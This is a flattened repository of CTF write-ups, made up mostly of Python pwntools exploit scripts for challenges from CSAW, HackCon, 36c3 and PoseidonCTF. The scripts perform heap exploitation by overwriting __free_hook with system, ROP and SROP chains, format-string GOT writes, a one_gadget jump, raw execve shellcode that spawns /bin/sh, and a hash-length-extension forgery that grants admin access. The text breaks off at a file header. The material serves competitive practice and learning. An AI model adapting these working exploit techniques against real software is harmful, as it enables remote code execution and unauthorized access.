├── 36c3 CTF └── pwn │ └── onetimepad │ ├── exploit.py │ └── onetimepad-3dacecfee0c81326.tar.xz ├── PoseidonCTF └── Oldnote │ ├── Oldnote.tar.gz │ ├── ld-2.32.so │ ├── libc-2.32.so │ └── solve.py ├── README.md ├── csaw2019 ├── RE │ └── beleaf │ │ ├── beleaf │ │ └── solve.py └── pwn │ ├── baby_boi │ ├── baby_boi │ ├── exploit.py │ └── libc-2.27.so │ ├── gotmilk │ ├── exploit.py │ ├── gotmilk │ └── libmylib.so │ ├── small_boi │ ├── exploit.py │ └── small_boi │ └── traveller │ ├── exploit.py │ └── traveller ├── csaw2020 ├── authy │ └── solve.py ├── grid │ └── grid.py ├── modus_operandi │ └── solve.py └── roppity │ └── exploit.py ├── hackcon2019 ├── crypto │ └── otp │ │ ├── README.md │ │ └── solve.py └── pwn │ ├── 2_small_2_pwn │ ├── .gdb_history │ ├── README.md │ ├── exploit.py │ └── q4 │ ├── Not_So_Easy_B0f │ ├── README.md │ ├── exploit.py │ ├── libc.so.6 │ └── q3 │ ├── babyb0f │ ├── README.md │ ├── exploit.py │ ├── libc.so.6 │ └── q1 │ └── babypwn │ ├── README.md │ ├── exploit.py │ └── q2 ├── inctf2020 └── Lab9 │ ├── .gdb_history │ ├── add.sh │ ├── bzImage │ ├── exploit │ ├── exploit.c │ ├── exploit_modprobe_path │ ├── exploit_modprobe_path.c │ ├── extract-vmlinux │ ├── fs │ ├── bin │ │ ├── [ │ │ ├── [[ │ │ ├── acpid │ │ ├── add-shell │ │ ├── addgroup │ │ ├── adduser │ │ ├── adjtimex │ │ ├── arp │ │ ├── arping │ │ ├── ash │ │ ├── awk │ │ ├── base64 │ │ ├── basename │ │ ├── beep │ │ ├── blkid │ │ ├── blockdev │ │ ├── bootchartd │ │ ├── brctl │ │ ├── bunzip2 │ │ ├── busybox │ │ ├── bzcat │ │ ├── bzip2 │ │ ├── cal │ │ ├── cat │ │ ├── catv │ │ ├── chat │ │ ├── chattr │ │ ├── chgrp │ │ ├── chmod │ │ ├── chown │ │ ├── chpasswd │ │ ├── chpst │ │ ├── chroot │ │ ├── chrt │ │ ├── chvt │ │ ├── cksum │ │ ├── clear │ │ ├── cmp │ │ ├── comm │ │ ├── conspy │ │ ├── cp │ │ ├── cpio │ │ ├── crond │ │ ├── crontab │ │ ├── cryptpw │ │ ├── cttyhack │ │ ├── cut │ │ ├── date │ │ ├── dc │ │ ├── dd │ │ ├── deallocvt │ │ ├── delgroup │ │ ├── deluser │ │ ├── depmod │ │ ├── devmem │ │ ├── df │ │ ├── dhcprelay │ │ ├── diff │ │ ├── dirname │ │ ├── dmesg │ │ ├── dnsd │ │ ├── dnsdomainname │ │ ├── dos2unix │ │ ├── du │ │ ├── dumpkmap │ │ ├── dumpleases │ │ ├── echo │ │ ├── ed │ │ ├── egrep │ │ ├── eject │ │ ├── env │ │ ├── envdir │ │ ├── envuidgid │ │ ├── ether-wake │ │ ├── expand │ │ ├── expr │ │ ├── fakeidentd │ │ ├── false │ │ ├── fbset │ │ ├── fbsplash │ │ ├── fdflush │ │ ├── fdformat │ │ ├── fdisk │ │ ├── fgconsole │ │ ├── fgrep │ │ ├── find │ │ ├── findfs │ │ ├── flock │ │ ├── fold │ │ ├── free │ │ ├── freeramdisk │ │ ├── fsck │ │ ├── fsck.minix │ │ ├── fsync │ │ ├── ftpd │ │ ├── ftpget │ │ ├── ftpput │ │ ├── fuser │ │ ├── getopt │ │ ├── getty │ │ ├── grep │ │ ├── groups │ │ ├── gunzip │ │ ├── gzip │ │ ├── halt │ │ ├── hd │ │ ├── hdparm │ │ ├── head │ │ ├── hexdump │ │ ├── hostid │ │ ├── hostname │ │ ├── httpd │ │ ├── hush │ │ ├── hwclock │ │ ├── id │ │ ├── ifconfig │ │ ├── ifdown │ │ ├── ifenslave │ │ ├── ifplugd │ │ ├── ifup │ │ ├── inetd │ │ ├── init │ │ ├── insmod │ │ ├── install │ │ ├── ionice │ │ ├── iostat │ │ ├── ip │ │ ├── ipaddr │ │ ├── ipcalc │ │ ├── ipcrm │ │ ├── ipcs │ │ ├── iplink │ │ ├── iproute │ │ ├── iprule │ │ ├── iptunnel │ │ ├── kbd_mode │ │ ├── kill │ │ ├── killall │ │ ├── killall5 │ │ ├── klogd │ │ ├── last │ │ ├── less │ │ ├── linux32 │ │ ├── linux64 │ │ ├── linuxrc │ │ ├── ln │ │ ├── loadfont │ │ ├── loadkmap │ │ ├── logger │ │ ├── login │ │ ├── logname │ │ ├── logread │ │ ├── losetup │ │ ├── lpd │ │ ├── lpq │ │ ├── lpr │ │ ├── ls │ │ ├── lsattr │ │ ├── lsmod │ │ ├── lsof │ │ ├── lspci │ │ ├── lsusb │ │ ├── lzcat │ │ ├── lzma │ │ ├── lzop │ │ ├── lzopcat │ │ ├── makedevs │ │ ├── makemime │ │ ├── man │ │ ├── md5sum │ │ ├── mdev │ │ ├── mesg │ │ ├── microcom │ │ ├── mkdir │ │ ├── mkdosfs │ │ ├── mke2fs │ │ ├── mkfifo │ │ ├── mkfs.ext2 │ │ ├── mkfs.minix │ │ ├── mkfs.vfat │ │ ├── mknod │ │ ├── mkpasswd │ │ ├── mkswap │ │ ├── mktemp │ │ ├── modinfo │ │ ├── modprobe │ │ ├── more │ │ ├── mount │ │ ├── mountpoint │ │ ├── mpstat │ │ ├── mt │ │ ├── mv │ │ ├── nameif │ │ ├── nanddump │ │ ├── nandwrite │ │ ├── nbd-client │ │ ├── nc │ │ ├── netstat │ │ ├── nice │ │ ├── nmeter │ │ ├── nohup │ │ ├── nslookup │ │ ├── ntpd │ │ ├── od │ │ ├── openvt │ │ ├── passwd │ │ ├── patch │ │ ├── pgrep │ │ ├── pidof │ │ ├── ping │ │ ├── ping6 │ │ ├── pipe_progress │ │ ├── pivot_root │ │ ├── pkill │ │ ├── pmap │ │ ├── popmaildir │ │ ├── poweroff │ │ ├── powertop │ │ ├── printenv │ │ ├── printf │ │ ├── ps │ │ ├── pscan │ │ ├── pstree │ │ ├── pwd │ │ ├── pwdx │ │ ├── raidautorun │ │ ├── rdate │ │ ├── rdev │ │ ├── readahead │ │ ├── readlink │ │ ├── readprofile │ │ ├── realpath │ │ ├── reboot │ │ ├── reformime │ │ ├── remove-shell │ │ ├── renice │ │ ├── reset │ │ ├── resize │ │ ├── rev │ │ ├── rm │ │ ├── rmdir │ │ ├── rmmod │ │ ├── route │ │ ├── rpm │ │ ├── rpm2cpio │ │ ├── rtcwake │ │ ├── run-parts │ │ ├── runlevel │ │ ├── runsv │ │ ├── runsvdir │ │ ├── rx │ │ ├── script │ │ ├── scriptreplay │ │ ├── sed │ │ ├── sendmail │ │ ├── seq │ │ ├── setarch │ │ ├── setconsole │ │ ├── setfont │ │ ├── setkeycodes │ │ ├── setlogcons │ │ ├── setserial │ │ ├── setsid │ │ ├── setuidgid │ │ ├── sh │ │ ├── sha1sum │ │ ├── sha256sum │ │ ├── sha512sum │ │ ├── showkey │ │ ├── slattach │ │ ├── sleep │ │ ├── smemcap │ │ ├── softlimit │ │ ├── sort │ │ ├── split │ │ ├── start-stop-daemon │ │ ├── stat │ │ ├── strings │ │ ├── stty │ │ ├── su │ │ ├── sulogin │ │ ├── sum │ │ ├── sv │ │ ├── svlogd │ │ ├── swapoff │ │ ├── swapon │ │ ├── switch_root │ │ ├── sync │ │ ├── sysctl │ │ ├── syslogd │ │ ├── tac │ │ ├── tail │ │ ├── tar │ │ ├── tcpsvd │ │ ├── tee │ │ ├── telnet │ │ ├── telnetd │ │ ├── test │ │ ├── tftp │ │ ├── tftpd │ │ ├── time │ │ ├── timeout │ │ ├── top │ │ ├── touch │ │ ├── tr │ │ ├── traceroute │ │ ├── traceroute6 │ │ ├── true │ │ ├── tty │ │ ├── ttysize │ │ ├── tunctl │ │ ├── udhcpc │ │ ├── udhcpd │ │ ├── udpsvd │ │ ├── umount │ │ ├── uname │ │ ├── unexpand │ │ ├── uniq │ │ ├── unix2dos │ │ ├── unlzma │ │ ├── unlzop │ │ ├── unxz │ │ ├── unzip │ │ ├── uptime │ │ ├── users │ │ ├── usleep │ │ ├── uudecode │ │ ├── uuencode │ │ ├── vconfig │ │ ├── vi │ │ ├── vlock │ │ ├── volname │ │ ├── wall │ │ ├── watch │ │ ├── watchdog │ │ ├── wc │ │ ├── wget │ │ ├── which │ │ ├── who │ │ ├── whoami │ │ ├── whois │ │ ├── xargs │ │ ├── xz │ │ ├── xzcat │ │ ├── yes │ │ ├── zcat │ │ └── zcip │ ├── exploit │ ├── exploit_modprobe_path │ ├── flag │ ├── home │ │ └── user │ │ │ └── root │ ├── init │ └── mod.ko │ ├── mod.ko │ ├── rootfs.cpio │ ├── start.sh │ └── vmlinux ├── picoctf └── 2019 │ └── pwn │ ├── sice_cream │ ├── exploit.py │ ├── libc-2.23.so │ └── sice_cream │ └── zero_to_hero │ ├── README.md │ ├── exploit.py │ ├── libc.so.6 │ └── zero_to_hero └── tctf └── chromium_rce ├── d8 ├── exploit.js ├── snapshot_blob.bin └── tctf.diff /36c3 CTF/pwn/onetimepad/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #Author: r4j 3 | 4 | from pwn import * 5 | from time import sleep 6 | 7 | context.terminal=['tmux','new-window'] 8 | e = ELF('./onetimepad') 9 | p = process('./onetimepad') 10 | #p = remote('88.198.154.140',31336) 11 | libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') 12 | 13 | def add(data): 14 | p.recvuntil('> ') 15 | p.sendline('w') 16 | sleep(0.2) 17 | p.sendline(data) 18 | 19 | def read(idx): 20 | p.recvuntil('> ') 21 | p.sendline('r') 22 | sleep(0.2) 23 | p.sendline(str(idx)) 24 | return p.recvline().strip() 25 | 26 | def edit(idx,data): 27 | p.recvuntil('> ') 28 | p.sendline('e') 29 | sleep(0.2) 30 | p.sendline(str(idx)) 31 | sleep(0.2) 32 | p.sendline(data) 33 | 34 | def junk(size): 35 | add('A'*size) 36 | 37 | add('\x00'*0x650) 38 | read(0) 39 | 40 | add('A'*8+p64(0x21)) #0 41 | add('A'*0x10) #1 00 42 | add('A'*0x10) #2 20 43 | add('A'*0x10) #3 40 44 | add('A'*0x10) #4 60 45 | add('A'*0x3a8+p64(0x21)) #5 80 46 | add('A'*8+p64(0x21)) 47 | 48 | read(3) 49 | read(4) 50 | 51 | edit(4,'') 52 | 53 | add('a') #3 54 | add('L'*8+p64(0x431)) #4 55 | 56 | read(1) 57 | add('A'*0x10) #1 58 | add('/bin/sh;'+'A'*0x28) #7 59 | 60 | leak = u64(read(3).ljust(8,'\x00')) - 0x1bbca0 61 | log.info('libc leak: '+hex(leak)) 62 | libc.address = leak 63 | 64 | read(1) 65 | read(4) 66 | 67 | add('A'*0x10+p64(libc.symbols['__free_hook'])) 68 | add('a') 69 | add(p64(libc.symbols['system'])) 70 | 71 | read(7) 72 | p.interactive() 73 | -------------------------------------------------------------------------------- /36c3 CTF/pwn/onetimepad/onetimepad-3dacecfee0c81326.tar.xz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/36c3 CTF/pwn/onetimepad/onetimepad-3dacecfee0c81326.tar.xz -------------------------------------------------------------------------------- /PoseidonCTF/Oldnote/Oldnote.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/PoseidonCTF/Oldnote/Oldnote.tar.gz -------------------------------------------------------------------------------- /PoseidonCTF/Oldnote/ld-2.32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/PoseidonCTF/Oldnote/ld-2.32.so -------------------------------------------------------------------------------- /PoseidonCTF/Oldnote/libc-2.32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/PoseidonCTF/Oldnote/libc-2.32.so -------------------------------------------------------------------------------- /PoseidonCTF/Oldnote/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | e = ELF('./oldnote') 3 | libc = ELF('./libc-2.26.so') 4 | p = None 5 | 6 | def c(ch): 7 | p.sendafter(': ', str(ch)) 8 | 9 | def add(size, data): 10 | c(1) 11 | c(size) 12 | c(data) 13 | 14 | def free(idx): 15 | c(2) 16 | c(idx) 17 | 18 | def exploit(): 19 | global p 20 | #p = process('./oldnote', env = {"LD_PRELOAD":'./libc-2.26.so'}) 21 | p = remote('poseidonchalls.westeurope.cloudapp.azure.com', 9000) 22 | add(0x10, chr(ord('A'))*0x10) 23 | 24 | for i in range(3): 25 | add(0xff, chr(ord('A'))*0x10) 26 | 27 | for i in range(2,4): 28 | free(i) 29 | 30 | for i in range(2): 31 | add(0xef, chr(ord('A'))*0x10) 32 | 33 | free(0) 34 | add(-1, '\x00'*0x18+p64(0x421)+p64(0x21)*150) 35 | free(1) 36 | 37 | for i in range(4): 38 | free(i) 39 | 40 | add(0xf0, 'L') 41 | add(0xd0, 'L') 42 | add(0x30, 'L') 43 | add(0x30, p16(0x4720)) 44 | 45 | for i in range(3): 46 | free(i) 47 | 48 | add(0xff, 'L') 49 | try: 50 | add(0xff, p64(0xfbad1800) + 3*p64(0)+"\x00") 51 | leak = p.recv() 52 | if '\x7f' not in leak: 53 | print "No leak" 54 | p.close() 55 | return 56 | print leak 57 | except: 58 | print "No" 59 | p.close() 60 | return 61 | libc.address = u64(leak[leak.find('\x7f')-5:leak.find('\x7f')+1].ljust(8, '\x00'))-0x3d73e0 62 | log.success('Libc base: '+hex(libc.address)) 63 | p.sendline('') 64 | free(0) 65 | free(3) 66 | add(0x30, p64(libc.symbols['__free_hook'])) 67 | add(0x30, '/bin/sh\x00') 68 | add(0x30, p64(libc.symbols['system'])) 69 | free(2) 70 | p.interactive() 71 | exit() 72 | 73 | for i in range(16): 74 | exploit() 75 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ctf-writeups 2 | Ctf Writeups 3 | -------------------------------------------------------------------------------- /csaw2019/RE/beleaf/beleaf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/RE/beleaf/beleaf -------------------------------------------------------------------------------- /csaw2019/RE/beleaf/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | values = [0x77,0x66,0x7b,0x5f,0x6e,0x79,0x7d,0xffffffff,0x62,0x6c,0x72,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0x61,0x65,0x69,0xffffffff,0x6f,0x74,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0x67,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0x75,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0x00] 3 | wanted = [0x01,0x09,0x11,0x27,0x02,0x00,0x12,0x03,0x08,0x12,0x09,0x12,0x11,0x01,0x03,0x13,0x04,0x03,0x05,0x15,0x2e,0x0a,0x03,0x0a,0x12,0x03,0x01,0x2e,0x16,0x2e,0x0a,0x12,0x06,] 4 | flag = '' 5 | 6 | for i in wanted: 7 | flag += chr(values[i]) 8 | 9 | print flag 10 | -------------------------------------------------------------------------------- /csaw2019/pwn/baby_boi/baby_boi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/pwn/baby_boi/baby_boi -------------------------------------------------------------------------------- /csaw2019/pwn/baby_boi/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | from pwn import * 3 | 4 | e = ELF('./baby_boi') 5 | libc = ELF('./libc-2.27.so') 6 | p = remote('pwn.chal.csaw.io',1005) 7 | #p = process('./baby_boi') 8 | offset = 'A'*40 9 | p.recvline() 10 | leak = p.recvline() 11 | leak = int(leak[leak.find('0x'):].strip(),16) 12 | libc_base_address = leak-libc.symbols['printf'] 13 | p.sendline(offset+p64(0x4f322+libc_base_address)) #one_gadget 14 | p.interactive() 15 | -------------------------------------------------------------------------------- /csaw2019/pwn/baby_boi/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/pwn/baby_boi/libc-2.27.so -------------------------------------------------------------------------------- /csaw2019/pwn/gotmilk/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | from pwn import * 3 | e = ELF('./gotmilk') 4 | lose = e.got['lose'] 5 | main = e.symbols['main'] 6 | printf = e.got['printf'] 7 | lib = ELF('./libmylib.so') 8 | p = remote('pwn.chal.csaw.io',1004) 9 | #p = process('./gotmilk') 10 | p.recvuntil('? ') 11 | p.sendline(p32(0x804a010)+"%133c%7$hhn") 12 | p.interactive() 13 | -------------------------------------------------------------------------------- /csaw2019/pwn/gotmilk/gotmilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/pwn/gotmilk/gotmilk -------------------------------------------------------------------------------- /csaw2019/pwn/gotmilk/libmylib.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/pwn/gotmilk/libmylib.so -------------------------------------------------------------------------------- /csaw2019/pwn/small_boi/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | from pwn import * 3 | e = ELF('./small_boi') 4 | #p = process('./small_boi') 5 | p = remote('pwn.chal.csaw.io',1002) 6 | context.arch="amd64" 7 | padding = "A"*40 8 | 9 | rw = 0x601000+100 10 | payload = padding + p64(0x40018a) + p64(rw) + p64(0x40018c) + p64(0x40018a) + p64(0xf) + p64(0x400185) 11 | 12 | shell = "/bin/sh\x00" 13 | frame = SigreturnFrame(kernel="amd64") 14 | frame.rax = 59 15 | frame.rdi = 0x4001ca 16 | frame.rsi = 0 17 | frame.rdx = 0 18 | frame.rsp = rw 19 | frame.rip = 0x400185 20 | payload += str(frame) 21 | payload += p64(rw) 22 | p.sendline(payload) 23 | __import__('time').sleep(0.5) 24 | p.sendline(shell) 25 | p.interactive() 26 | -------------------------------------------------------------------------------- /csaw2019/pwn/small_boi/small_boi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/pwn/small_boi/small_boi -------------------------------------------------------------------------------- /csaw2019/pwn/traveller/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | from pwn import * 3 | context(arch="amd64",os="linux",timeout=0.5) 4 | e = ELF('./traveller') 5 | #p = process('./traveller') 6 | p = remote('pwn.chal.csaw.io',1003) 7 | 8 | p.recvuntil('> ') 9 | p.sendline('1') #create 10 | p.recvuntil('> ') 11 | p.sendline('1') # malloc(0x80) 12 | p.recvuntil('Destination: ') 13 | p.sendline('/bin/sh') 14 | 15 | p.recvuntil('> ') 16 | p.sendline('2') 17 | p.recvuntil(': ') 18 | p.sendline('-262194') # __free_hook 19 | p.sendline(p64(e.symbols['system'])) #overwriting free hook with system 20 | 21 | p.recvuntil('>') 22 | p.sendline('3') 23 | p.recvuntil(': ') 24 | p.sendline('0') # trigerring __free_hook by calling free 25 | p.interactive() 26 | -------------------------------------------------------------------------------- /csaw2019/pwn/traveller/traveller: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/pwn/traveller/traveller -------------------------------------------------------------------------------- /csaw2020/authy/solve.py: -------------------------------------------------------------------------------- 1 | import hashpumpy, hashlib 2 | from requests import get, post 3 | host, port = 'crypto.chal.csaw.io', 5003 4 | def new(author, note): return post('http://{}:{}/new'.format(host, port).encode(), data={'author':author, 'note': note}).content.strip().split(' ')[2].split(':') 5 | def view(id, integrity): return post('http://{}:{}/view'.format(host, port), data={'id':id, 'integrity': integrity}).content 6 | secret_length = 13 7 | data = new('asd', 'asd') 8 | sig = hashpumpy.hashpump(data[1], data[0].decode('base64'), '&entrynum=7&admin=True&access_sensitive=True', secret_length) 9 | print (view(sig[1].replace('\x80', '\\x80').replace('\xe0', '\\xe0').encode('base64'), sig[0])) 10 | -------------------------------------------------------------------------------- /csaw2020/grid/grid.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | e = ELF('./grid') 3 | libc = e.libc 4 | #p = process(e.path, env = {'LD_PRELOAD':'./libstdc.so.6.0.25'}) 5 | p = remote('pwn.chal.csaw.io', 5013) 6 | idx = -85 7 | def do(char): 8 | global idx 9 | p.recvuntil('shape>', timeout=0.5) 10 | p.sendline(char) 11 | p.recvuntil('loc> ', timeout=0.5) 12 | p.sendline('5'+str(idx)) 13 | p.recvuntil('shape> ', timeout=0.5) 14 | p.sendline('d') 15 | idx -= 1 16 | 17 | p.sendlineafter('shape> ', 'd') 18 | leak = p.recv() 19 | libc.address = u64(leak[37:43] + "\x00"*2)-0x4ec5da 20 | log.succes('Libc leak: '+hex(libc.address)) 21 | pog = p64(libc.address+0x4f365)[::-1][2:] # one_gadget 22 | for i in pog: 23 | do(i) 24 | 25 | pause() 26 | for i in range(2): 27 | p.sendline('\x00') 28 | p.interactive() 29 | -------------------------------------------------------------------------------- /csaw2020/modus_operandi/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | #unintended but works 3 | from pwn import remote 4 | r = remote('crypto.chal.csaw.io', 5001) 5 | def do(p, t): 6 | r.sendlineafter(':', p, timeout=1) 7 | r.sendlineafter('?', t) 8 | 9 | x = ['ECB', 'CBC'] 10 | a = [0] 11 | 12 | def con(): 13 | for i in a: 14 | do('d', x[i]) 15 | con() 16 | while 1: 17 | try: 18 | do('d', x[0]) 19 | a.append(0) 20 | except: 21 | a = a[:-1] 22 | a.append(1) 23 | flag = '' 24 | for i in range(0, len(a), 8): 25 | flag += chr(int(''.join([str(b) for b in a[i:i+8]]), 2)) 26 | print (flag) 27 | r = remote('crypto.chal.csaw.io', 5001) 28 | con() 29 | continue 30 | 31 | r.interactive() 32 | -------------------------------------------------------------------------------- /csaw2020/roppity/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | payload = 'A'*40 3 | context.arch='amd64' 4 | e = ELF('./rop') 5 | libc = ELF('./libc-2.27.so') 6 | #libc = e.libc 7 | #p = process(e.path) 8 | p = remote('pwn.chal.csaw.io', 5016) 9 | payload = 'A'*40 10 | r = ROP(e) 11 | r.puts(e.got['puts']) 12 | r.main() 13 | payload += r.chain() 14 | p.recvline() 15 | p.sendline(payload) 16 | leak = u64(p.recv(6).ljust(8,'\x00')) 17 | libc.address = leak-libc.symbols['puts'] 18 | print hex(libc.address) 19 | r = ROP(libc) 20 | r.system(libc.search('/bin/sh').next()) 21 | payload = 'A'*40 + r.chain() 22 | p.recvline() 23 | p.sendline(payload) 24 | p.interactive() 25 | -------------------------------------------------------------------------------- /hackcon2019/crypto/otp/README.md: -------------------------------------------------------------------------------- 1 | hackerman is so dank that he decided to play around with OTPs. 2 | he did the following: 3 | message1 ^ key = cipher1 4 | message2 ^ key = cipher2 5 | 6 | He gives you cipher1 and cipher2 and challenges you to find the concatenation of messages 1 and 2. 7 | Are you dank enough to find this? 8 | Oh and also, 'meme' is so popular that hackerman used the word in both his messages. 9 | cipher1 is '\x05F\x17\x12\x14\x18\x01\x0c\x0b4' 10 | cipher2 is '>\x1f\x00\x14\n\x08\x07Q\n\x0e' 11 | Both without quotes 12 | -------------------------------------------------------------------------------- /hackcon2019/crypto/otp/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #flag format: d4rk{flag}c0de 3 | from pwn import xor 4 | c1 = '\x05F\x17\x12\x14\x18\x01\x0c\x0b4' 5 | c2 = '>\x1f\x00\x14\n\x08\x07Q\n\x0e' 6 | 7 | c = c1 + c2 8 | 9 | key1 = xor(c1[:5],'d4rk{') 10 | key2 = xor(c2[-5:],'}c0de') 11 | key = key1+key2 12 | 13 | print xor(c,key) #flag 14 | -------------------------------------------------------------------------------- /hackcon2019/pwn/2_small_2_pwn/.gdb_history: -------------------------------------------------------------------------------- 1 | info functions 2 | -------------------------------------------------------------------------------- /hackcon2019/pwn/2_small_2_pwn/README.md: -------------------------------------------------------------------------------- 1 | I just read and write , Can you still Pwn me ? 2 | 3 | Service is running at nc 68.183.158.95 8992 4 | 5 | -------------------------------------------------------------------------------- /hackcon2019/pwn/2_small_2_pwn/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | #e = ELF('./q4') 3 | #p = process('./q4',stdin=PTY) 4 | p = remote('68.183.158.95',8992) 5 | payload = "A"*16 6 | payload += p64(0x600000+0x10) # rwxp 7 | payload += p64(0x4000c7) # main+8 8 | payload += "A"*(160-len(payload)) 9 | #payload += "AAAAAAAA"*5 10 | payload += p64(0x600030)*4 11 | payload += "A"*8*2 12 | payload += "4831f648c7c74400600048c7c03b000000990f05".decode('hex') #shellcode 13 | ''' 14 | xor rsi,rsi 15 | mov rdi,0x600044 16 | mov rax, 59 17 | cdq 18 | syscall 19 | ''' 20 | payload += "/bin/sh\x00" #shell 21 | p.sendline(payload) 22 | p.recv(10000) 23 | p.recv(10000,timeout=1) 24 | p.interactive() 25 | -------------------------------------------------------------------------------- /hackcon2019/pwn/2_small_2_pwn/q4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/hackcon2019/pwn/2_small_2_pwn/q4 -------------------------------------------------------------------------------- /hackcon2019/pwn/Not_So_Easy_B0f/README.md: -------------------------------------------------------------------------------- 1 | I have stack canaries enabled, Can you still B0f me ? 2 | Service : nc 68.183.158.95 8991 3 | 4 | -------------------------------------------------------------------------------- /hackcon2019/pwn/Not_So_Easy_B0f/exploit.py: 